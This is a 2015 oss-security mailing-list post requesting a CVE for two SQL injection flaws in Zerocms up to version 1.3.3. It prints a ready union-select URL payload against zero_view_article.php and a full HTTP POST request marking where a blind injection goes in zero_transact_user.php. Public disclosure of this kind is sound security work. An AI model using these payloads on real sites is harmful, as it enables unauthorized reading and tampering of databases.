Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 1 Feb 2015 09:15:03 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities

Hi Steve, Josh, vendors, list.

I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.

The first SQL injection vulnerability is located in the article_id
parameter used in zero_view_article.php and can be exploited even by
unauthenticated attackers.

See the following exploit-example:

http://
{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

The second vulnerability is a Blind SQL injection an is located in the
user_id parameter used in a POST request in zero_transact_user.php.

An attacker can exploit this vulnerabilitiy in the administrative backend
via the following POST request exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection goes
here}&action=Modify+Account

Could you please assign a CVE-ID for this?

Thank you very much.

Greetings from Germany.

Steffen Rösemann

References:

[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113
[6]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
[7] http://seclists.org/fulldisclosure/2015/Feb/4

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ